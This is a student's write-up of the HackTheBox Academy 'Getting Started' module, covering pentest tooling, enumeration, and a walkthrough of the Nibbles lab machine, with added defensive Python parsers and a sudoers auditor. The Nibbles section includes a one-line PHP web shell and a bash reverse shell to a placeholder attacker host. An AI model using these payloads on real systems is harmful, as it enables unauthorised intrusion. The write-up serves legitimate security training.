Fundamentals of Pentesting

May 18, 2025

Student: Tapiwanashe Mlambo
Module: HackTheBox Academy - Getting Started
Achievement Link: https://academy.hackthebox.com/achievement/1918408/77


1.0 Executive Summary

This report documents the completion of the HackTheBox Academy “Getting Started” module, which serves as a comprehensive introduction to penetration testing fundamentals. The module provided hands-on experience with essential cybersecurity concepts, tools, and methodologies that form the foundation of ethical hacking and security assessment practices.

The lab covered critical areas including penetration testing distributions, service enumeration, web application security, exploit identification, privilege escalation, and file transfer techniques. The culminating practical exercise involved the complete compromise of the “Nibbles” machine, demonstrating the application of learned concepts in a real-world scenario.

2.0 Learning Objectives

Upon completion of this laboratory exercise, the following competencies were developed:

  • Understanding of information security principles and the CIA triad
  • Proficiency in penetration testing distribution setup and configuration
  • Mastery of essential penetration testing tools and utilities
  • Competence in network service scanning and enumeration techniques
  • Skills in web application reconnaissance and vulnerability identification
  • Knowledge of shell types and their practical applications
  • Understanding of privilege escalation techniques
  • Proficiency in secure file transfer methods
  • Practical experience in end-to-end penetration testing methodology

3.0 Information Security Foundation

3.1 Core Principles

Information security fundamentally revolves around protecting the confidentiality, integrity, and availability (CIA triad) of data and systems. This laboratory reinforced these principles through practical application:

  • Confidentiality: Ensuring unauthorized users cannot access sensitive information
  • Integrity: Maintaining data accuracy and preventing unauthorized modifications
  • Availability: Ensuring systems and data remain accessible to authorized users

3.2 Penetration Testing Context

Penetration testing serves as a proactive security measure, simulating real-world attacks to identify vulnerabilities before malicious actors can exploit them. This ethical hacking approach provides organizations with actionable insights to strengthen their security posture.

4.0 Laboratory Infrastructure Setup

4.1 Penetration Testing Distribution

The laboratory began with configuring a proper penetration testing environment using Parrot OS. Key considerations included:

  • Virtualization Strategy: Implementing proper isolation between virtual machines to prevent cross-contamination
  • Resource Allocation: Ensuring adequate system resources for effective tool operation
  • Network Configuration: Establishing secure communication channels while maintaining isolation
  • Tool Verification: Confirming the availability and functionality of essential penetration testing utilities

4.2 Home Lab Environment

A structured home laboratory environment was established following industry best practices:

  • Segmented Networks: Creating isolated network segments for different testing scenarios
  • Documentation Standards: Implementing consistent documentation practices for reproducibility
  • Backup Procedures: Establishing regular backup protocols to prevent data loss
  • Update Management: Maintaining current tool versions and security patches

5.0 Organizational Methodology

5.1 Documentation Framework

Effective penetration testing requires meticulous documentation. The following organizational structure was implemented:

Project Root/
├── Evidence/
│   ├── Screenshots/
│   ├── Network_Captures/
│   └── Log_Files/
├── Credentials/
│   ├── Discovered/
│   └── Generated/
├── Scan_Results/
│   ├── Network_Scans/
│   ├── Web_Scans/
│   └── Vulnerability_Scans/
├── Scope/
│   ├── Target_Lists/
│   └── Rules_of_Engagement/
└── Reports/
    ├── Draft/
    └── Final/

5.2 Knowledge Management Tools

Several note-taking and knowledge management platforms were evaluated:

  • Cherrytree: Hierarchical note-taking with rich text formatting capabilities
  • Notion: Collaborative workspace with database functionality
  • GitBook: Version-controlled documentation with team collaboration features

6.0 Network Connectivity and Security

6.1 VPN Configuration

Virtual Private Network (VPN) connectivity ensures secure communication between the testing environment and target systems. Key concepts covered included:

  • Client-based VPNs: Traditional VPN clients requiring software installation
  • SSL VPNs: Browser-based VPN access through secure web portals
  • Connection Verification: Testing connectivity and ensuring proper routing
  • Traffic Analysis: Monitoring VPN traffic for anomalies or security concerns

7.0 Fundamental Penetration Testing Concepts

7.1 Shell Types and Applications

Understanding different shell types is crucial for maintaining access to compromised systems:

7.1.1 Reverse Shells

  • Mechanism: Target system initiates connection back to attacker
  • Advantages: Bypasses outbound firewall restrictions
  • Use Cases: Environments with restrictive inbound filtering

7.1.2 Bind Shells

  • Mechanism: Target system listens on a specific port for incoming connections
  • Advantages: Direct connection establishment
  • Limitations: Requires open inbound ports on target

7.1.3 Web Shells

  • Mechanism: Web-based interface for command execution
  • Advantages: Utilizes existing web server infrastructure
  • Stealth: Often harder to detect than traditional shells

8.0 Essential Tool Proficiency

8.1 Secure Shell (SSH)

SSH provides encrypted remote access capabilities essential for secure administration:

# Basic SSH connection
ssh username@target_ip
# SSH with specific port
ssh -p 2222 username@target_ip
# SSH with key-based authentication
ssh -i private_key username@target_ip

8.2 Netcat - The Network Swiss Army Knife

Netcat enables versatile network communication and troubleshooting:

# Port scanning: -z connects without sending data, -n skips DNS lookups, -v reports each result
nc -nvz target_ip start_port-end_port
# Banner grabbing: connect and read whatever the service announces
nc -nv target_ip port
# Reverse shell listener
nc -nlvp local_port

8.3 Terminal Multiplexer (Tmux)

Tmux facilitates efficient multi-session terminal management:

# Create new session
tmux new-session -d -s session_name
# Attach to existing session
tmux attach-session -t session_name
# List active sessions
tmux list-sessions

8.4 Vim Text Editor

Vim proficiency enhances productivity in command-line environments:

  • Modal Editing: Understanding insert, command, and visual modes
  • Navigation: Efficient cursor movement and text manipulation
  • Search and Replace: Pattern matching and bulk text modifications
  • Configuration: Customizing editor behavior through .vimrc

9.0 Service Discovery and Enumeration

9.1 Network Mapping with Nmap

Network reconnaissance forms the foundation of any penetration test. Nmap provides comprehensive port scanning and service enumeration capabilities:

9.1.1 Basic Scanning Techniques

# TCP SYN scan (nmap's default when run as root; unprivileged runs fall back to a TCP connect scan)
nmap -sS target_ip
# UDP scan
nmap -sU target_ip
# Comprehensive scan: SYN + UDP, OS detection, version detection, default scripts
nmap -sS -sU -O -sV -sC target_ip

9.1.2 Advanced Enumeration

# Script scanning
nmap --script vuln target_ip
# Aggressive scanning
nmap -A target_ip
# Stealth scanning
nmap -sS -f -D decoy_ip target_ip

9.2 Service Fingerprinting

Identifying specific service versions enables targeted vulnerability research:

  • Banner Grabbing: Extracting service identification strings
  • Version Detection: Determining exact software versions
  • Operating System Fingerprinting: Identifying target platform characteristics

10.0 Web Application Reconnaissance

10.1 Directory and File Discovery

Web applications often contain hidden resources that provide attack vectors:

10.1.1 Gobuster Implementation

# Directory brute-forcing
gobuster dir -u http://target_ip -w /path/to/wordlist
# DNS subdomain enumeration
gobuster dns -d target_domain -w /path/to/wordlist
# Virtual host discovery
gobuster vhost -u http://target_ip -w /path/to/wordlist

10.1.2 FFUF (Fuzz Faster U Fool)

# Directory fuzzing
ffuf -u http://target_ip/FUZZ -w /path/to/wordlist
# Parameter fuzzing (quote the URL so the shell does not interpret ? and &)
ffuf -u "http://target_ip/page?FUZZ=value" -w /path/to/wordlist
# POST data fuzzing (set the method and form content type explicitly)
ffuf -u http://target_ip/login -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -w /path/to/wordlist

10.2 HTTP Analysis Techniques

Understanding HTTP responses provides valuable reconnaissance information:

  • Status Code Interpretation: Analyzing 200, 403, 404, and other response codes
  • Header Analysis: Examining server headers for technology identification
  • SSL/TLS Certificate Analysis: Extracting domain and organizational information
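The three bullet points above describe what to read out of a response; the following added example (my own code, not part of the HackTheBox module or this write-up) turns that reading into a small parser. It takes a raw HTTP response, extracts the status code, the stack-identifying headers and any HTML comments left in the page body, and attaches the interpretation a tester records for each status. The sample response, its header values and its comments are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed raw HTTP response used as the sample input. The header values,
# the HTML and the comments are invented for this example, not captured from Nibbles.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 18 May 2025 10:00:00 GMT\r\n"
    "Server: Apache/2.4.0 (Constructed)\r\n"
    "X-Powered-By: PHP/0.0-constructed\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body>\n"
    "<h1>Hello world!</h1>\n"
    "<!-- staging copy of the site lives under /old-site/ -->\n"
    "<p>Nothing to see here.</p>\n"
    "<!-- TODO(dev): remove debug.php before launch -->\n"
    "</body></html>\n"
)

# Headers that commonly reveal the server stack; on the defending side these are
# the ones to trim (Apache's "ServerTokens Prod", PHP's "expose_php = Off").
TECH_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")

# What a given status tells the tester during directory enumeration.
STATUS_HINTS = {
    200: "resource exists and is readable",
    301: "redirect; follow the Location header",
    302: "redirect; follow the Location header",
    401: "resource exists but needs authentication",
    403: "resource exists but access is denied (still worth recording)",
    404: "not found",
    500: "server error; error pages sometimes leak paths or stack traces",
}

HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.DOTALL)


def parse_http_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw response into (status code, lower-cased header map, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ")[1])          # "HTTP/1.1 200 OK" -> 200
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")      # split at the first colon only
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify_status(status: int) -> str:
    """Map a status code to its class (2xx success, 3xx redirect, ...)."""
    return {2: "success", 3: "redirect", 4: "client error", 5: "server error"}.get(
        status // 100, "informational"
    )


def technology_hints(headers: Dict[str, str]) -> Dict[str, str]:
    """Return only the headers that identify server-side technology."""
    return {h: headers[h] for h in TECH_HEADERS if h in headers}


def html_comments(body: str) -> List[str]:
    """Pull every HTML comment out of the body; developer notes often hide here."""
    return [c.strip() for c in HTML_COMMENT.findall(body)]


def analyse(raw: str) -> dict:
    status, headers, body = parse_http_response(raw)
    return {
        "status": status,
        "class": classify_status(status),
        "hint": STATUS_HINTS.get(status, "no specific hint"),
        "technology": technology_hints(headers),
        "comments": html_comments(body),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_RESPONSE).items():
        print(f"{key}: {value}")
```

The same parser run over a server you administer shows exactly what an outside tester sees, which makes it a quick check that version-revealing headers have been suppressed and that no stray comments survived into production.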

11.0 Vulnerability Identification and Exploitation

11.1 Public Exploit Research

Leveraging existing exploits accelerates the penetration testing process:

11.1.1 Exploit Databases

  • Exploit-DB: Comprehensive repository of public exploits
  • CVE Database: Common Vulnerabilities and Exposures tracking
  • Metasploit Framework: Automated exploitation platform

11.1.2 Exploit Verification Process

  1. Vulnerability Confirmation: Verifying target susceptibility
  2. Exploit Customization: Adapting exploits for specific environments
  3. Payload Selection: Choosing appropriate post-exploitation payloads
  4. Execution Monitoring: Tracking exploit success and failure conditions

11.2 Manual Exploitation Techniques

Understanding manual exploitation deepens comprehension of vulnerability mechanics:

  • Code Analysis: Reviewing exploit source code for understanding
  • Modification Techniques: Adapting exploits for specific scenarios
  • Debugging Methods: Troubleshooting failed exploitation attempts

12.0 Post-Exploitation Activities

12.1 Privilege Escalation Strategies

Gaining elevated privileges expands attack capabilities and demonstrates impact:

12.1.1 Linux Privilege Escalation

Common techniques include:

  • SUID Binary Exploitation: Leveraging misconfigured SUID programs
  • Kernel Exploits: Exploiting operating system vulnerabilities
  • Service Misconfigurations: Abusing improperly configured services
  • Credential Harvesting: Extracting stored passwords and keys

12.1.2 Enumeration Scripts

Automated enumeration tools accelerate privilege escalation discovery:

# LinEnum script
./LinEnum.sh
# Linux Exploit Suggester
./linux-exploit-suggester.sh
# LinPEAS
./linpeas.sh

12.2 Persistence Mechanisms

Maintaining access to compromised systems enables continued assessment:

  • Backdoor Installation: Creating alternative access methods
  • Service Modification: Altering existing services for persistence
  • Scheduled Task Creation: Implementing recurring access mechanisms

13.0 Data Exfiltration and File Transfer

13.1 File Transfer Techniques

Moving data between systems requires understanding multiple transfer methods:

13.1.1 HTTP-Based Transfers

# wget download
wget http://attacker_ip/file
# cURL download
curl -O http://attacker_ip/file
# Python HTTP server
python3 -m http.server 8000

13.1.2 Secure Copy Protocol (SCP)

# File upload to remote system
scp local_file username@remote_ip:/remote/path/
# File download from remote system
scp username@remote_ip:/remote/file local_path/

13.1.3 Base64 Encoding

# Encode file for transfer
base64 file > encoded_file
# Decode received file
base64 -d encoded_file > original_file

13.2 Steganography and Covert Channels

Advanced file transfer techniques help evade detection:

  • Image Steganography: Hiding data within image files
  • DNS Tunneling: Using DNS queries for data transmission
  • ICMP Tunneling: Leveraging ping packets for communication

14.0 Practical Application: Nibbles Machine

14.1 Initial Reconnaissance

The Nibbles machine served as a comprehensive practical exercise combining all learned techniques:

14.1.1 Port Scanning Results

# Nmap scan results
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH (protocol 2.0)
80/tcp open  http    Apache httpd
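The port table above is nmap's normal output format, and sections 9.1 and 9.2 describe reading service and version information out of it. As an added example (my own code, not from the HackTheBox module or this write-up), the parser below turns that table into records and reports which open ports still lack a version string, i.e. where a follow-up version probe or manual banner grab is still needed. The sample text reuses the two rows quoted above; the host line, the port counts and the filtered 443/tcp row are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample in the shape of nmap's normal output. The 22/tcp and 80/tcp
# rows carry the same service strings as the scan quoted in this write-up; the
# host line and the 443/tcp row are invented to exercise the parser.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host is up (0.045s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH (protocol 2.0)
80/tcp  open     http    Apache httpd
443/tcp filtered https

Service Info: OS: Linux
"""

# One table row: "<port>/<proto> <state> <service> [<version text>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+"
    r"(?P<state>[\w|]+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str          # open, closed, filtered, open|filtered, ...
    service: str
    version: Optional[str]   # None when nmap printed nothing in the VERSION column


def parse_nmap_ports(text: str) -> List[PortRecord]:
    """Extract the port table from nmap's normal (human-readable) output."""
    records: List[PortRecord] = []
    in_table = False
    for line in text.splitlines():
        if line.startswith("PORT"):          # header row: PORT STATE SERVICE [VERSION]
            in_table = True
            continue
        if not in_table:
            continue
        m = PORT_LINE.match(line)
        if m is None:                        # a blank line or footer ends the table
            in_table = False
            continue
        records.append(
            PortRecord(int(m["port"]), m["proto"], m["state"], m["service"], m["version"])
        )
    return records


def open_ports(records: List[PortRecord]) -> List[Tuple[int, str]]:
    """(port, service) pairs for ports nmap reported as open."""
    return [(r.port, r.service) for r in records if r.state == "open"]


def missing_versions(records: List[PortRecord]) -> List[int]:
    """Open ports with no version string: candidates for a -sV rerun or a manual banner grab."""
    return [r.port for r in records if r.state == "open" and r.version is None]


if __name__ == "__main__":
    recs = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    for r in recs:
        print(f"{r.port}/{r.proto} {r.state} {r.service} {r.version or '-'}")
    print("open:", open_ports(recs))
    print("no version yet:", missing_versions(recs))
```

Parsing the text table is convenient for quick notes; for anything automated, nmap's `-oX` or `-oG` output is the more stable input, but the same record structure applies.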

14.1.2 Service Enumeration

  • SSH Service: Standard secure shell implementation
  • HTTP Service: Apache web server hosting web applications

14.2 Web Application Discovery

14.2.1 Initial Web Reconnaissance

The web server revealed minimal information through standard browsing, necessitating deeper enumeration:

  • Source Code Analysis: Examining HTML source for hidden comments
  • Directory Enumeration: Systematic discovery of hidden directories
  • Technology Fingerprinting: Identifying underlying web technologies

14.2.2 Nibbleblog Discovery

Directory enumeration revealed the /nibbleblog/ directory containing a content management system:

  • CMS Identification: Recognizing Nibbleblog installation
  • Version Determination: Establishing specific software version
  • Default Configuration Analysis: Identifying potential security weaknesses

14.3 Initial Access Achievement

14.3.1 Authentication Bypass

The Nibbleblog installation utilized default or weak credentials:

  • Credential Guessing: Systematic password attempts
  • Default Account Analysis: Testing common username/password combinations
  • Brute Force Considerations: Balancing speed with detection avoidance

14.3.2 Administrative Access

Successful authentication provided administrative access to the CMS:

  • Interface Exploration: Understanding available functionality
  • Upload Capabilities: Identifying file upload mechanisms
  • Security Control Assessment: Evaluating implemented protections

14.4 Code Execution and Shell Access

14.4.1 File Upload Exploitation

The CMS plugin upload functionality enabled arbitrary code execution:

<?php
system($_GET['cmd']);
?>

14.4.2 Reverse Shell Implementation

Upgrading from web shell to reverse shell provided enhanced capabilities:

# Reverse shell payload
bash -i >& /dev/tcp/attacker_ip/port 0>&1

14.5 Privilege Escalation

14.5.1 System Enumeration

Initial access provided limited user privileges requiring escalation:

  • User Context Analysis: Understanding current privilege level
  • System Configuration Review: Identifying potential escalation vectors
  • File Permission Auditing: Discovering writable system files

14.5.2 Sudoers Misconfiguration

System analysis revealed sudoers misconfigurations enabling privilege escalation:

# Sudoers entry allowing specific command execution
nibbler ALL=(ALL:ALL) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

14.5.3 Root Access Achievement

Exploiting the sudoers misconfiguration provided root access:

  1. Script Modification: Altering the monitor.sh script
  2. Payload Insertion: Adding privilege escalation commands
  3. Execution: Running the script with sudo privileges
  4. Verification: Confirming root access acquisition
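The sudoers rule in 14.5.2 is dangerous because the command it grants lives in the user's own home directory, so the user can rewrite what runs as root. As an added example (my own code, not from the HackTheBox module or this write-up), the audit below reads sudoers-style rules and flags exactly that pattern from the defender's side: targets under user-writable directories, target files writable by non-root users, wildcards that admit extra arguments, and passwordless `ALL` grants. The nibbler line in the sample is the one quoted above; the other rules, and the directory list treated as user-writable, are constructed assumptions.

```python
import os
import re
import stat
from typing import Callable, List, NamedTuple

# Constructed sample sudoers content. The nibbler rule is the one quoted in this
# write-up; the remaining rules are invented for contrast and are not from the lab.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
nibbler ALL=(ALL:ALL) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
ci      ALL=(ALL) NOPASSWD: ALL
deploy  ALL=(root) /usr/local/bin/deploy.sh, /usr/bin/systemctl restart app*
"""

# user  host=(runas) [TAG: ...] command[, command...]
SUDO_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

# Directories an unprivileged user can normally write to (assumed list). A sudo
# target stored here can be edited by that user, which is what happened on Nibbles.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


class Finding(NamedTuple):
    user: str
    command: str
    nopasswd: bool
    reasons: List[str]


def non_root_writable(path: str) -> bool:
    """True if the file exists and is group/other-writable or not owned by root."""
    try:
        st = os.stat(path)
    except OSError:
        return False                          # absent on this host; nothing to check
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_sudoers(text: str, writable: Callable[[str], bool] = non_root_writable) -> List[Finding]:
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE.match(line)
        if not m:
            continue                          # aliases and includes are out of scope here
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            reasons: List[str] = []
            exe = cmd.split(" ", 1)[0]        # first token is the executable path
            if cmd == "ALL":
                if nopasswd:
                    reasons.append("passwordless unrestricted root")
            else:
                if exe.startswith(USER_WRITABLE_PREFIXES):
                    reasons.append("target lives under a user-writable directory")
                if writable(exe):
                    reasons.append("target file is writable by a non-root user")
                if "*" in cmd:
                    reasons.append("wildcard in command allows extra arguments")
            if reasons:
                findings.append(Finding(m["user"], cmd, nopasswd, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD " if f.nopasswd else ""
        print(f"{f.user}: {tag}{f.command}\n    - " + "\n    - ".join(f.reasons))
```

Run against a real host (`sudo cat /etc/sudoers /etc/sudoers.d/*`), the file-mode check adds the case the path prefix misses: a script under /usr/local/bin that has been left writable by its deploying user. The remediation for the nibbler-style finding is to move the script to a root-owned, root-writable-only location and re-point the rule at it.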

14.6 Knowledge Check Validation

The independent knowledge check exercise tested comprehensive understanding without guided instruction:

  • Autonomous Problem Solving: Applying learned techniques independently
  • Creative Thinking: Developing novel approaches to challenges
  • Persistence: Maintaining effort through difficult enumeration phases
  • Documentation: Recording discovery process for future reference

15.0 Lessons Learned and Challenges

15.1 Technical Insights

The laboratory experience provided several key insights:

  • Enumeration Criticality: Thorough enumeration often reveals the most effective attack vectors
  • Tool Integration: Combining multiple tools provides comprehensive coverage
  • Patience Requirements: Effective penetration testing requires methodical persistence
  • Documentation Value: Detailed documentation enables knowledge retention and sharing

15.2 Skill Development Areas

Areas requiring continued development include:

  • Advanced Enumeration Techniques: Exploring sophisticated reconnaissance methods
  • Custom Exploit Development: Creating tailored exploits for specific vulnerabilities
  • Steganography Applications: Implementing covert communication channels
  • Automated Tool Development: Creating custom scripts for specific testing scenarios

15.3 Time Management Considerations

The complexity of the module exceeded initial time estimates, highlighting the importance of:

  • Realistic Planning: Allowing adequate time for thorough testing
  • Incremental Progress: Breaking complex tasks into manageable components
  • Learning Integration: Balancing speed with knowledge retention
  • Quality Focus: Prioritizing understanding over completion speed

16.0 Conclusion

The HackTheBox Getting Started module provided an exceptional introduction to penetration testing fundamentals. The comprehensive coverage of essential concepts, combined with hands-on practical application, established a solid foundation for advanced cybersecurity studies.

The progression from basic tool usage through complete system compromise demonstrated the interconnected nature of penetration testing activities. Each component built upon previous knowledge, culminating in the successful compromise of the Nibbles machine.

The laboratory experience emphasized the critical importance of methodical enumeration, persistent investigation, and comprehensive documentation. These skills extend beyond technical proficiency to encompass the analytical mindset essential for effective cybersecurity practice.

The challenging nature of the module, particularly the independent knowledge check, reinforced the necessity of continuous learning and adaptation in the rapidly evolving cybersecurity landscape. The satisfaction derived from overcoming complex challenges validated the educational approach and motivated continued advancement in the field.

This foundational experience establishes the groundwork for advanced penetration testing studies and practical cybersecurity application. The combination of theoretical understanding and hands-on experience provides confidence for tackling more complex security challenges in future endeavors.

17.0 References and Resources

17.1 Primary Learning Resources

  • HackTheBox Academy Getting Started Module
  • Official tool documentation and manual pages
  • Industry-standard penetration testing methodologies

17.2 Additional Study Materials

  • OWASP Testing Guide
  • NIST Cybersecurity Framework
  • SANS Penetration Testing Guidelines
  • CVE Database and Exploit-DB repositories

17.3 Tool Documentation

  • Nmap Network Discovery and Security Auditing
  • Netcat Network Utility Documentation
  • Vim Editor User Manual
  • Tmux Terminal Multiplexer Guide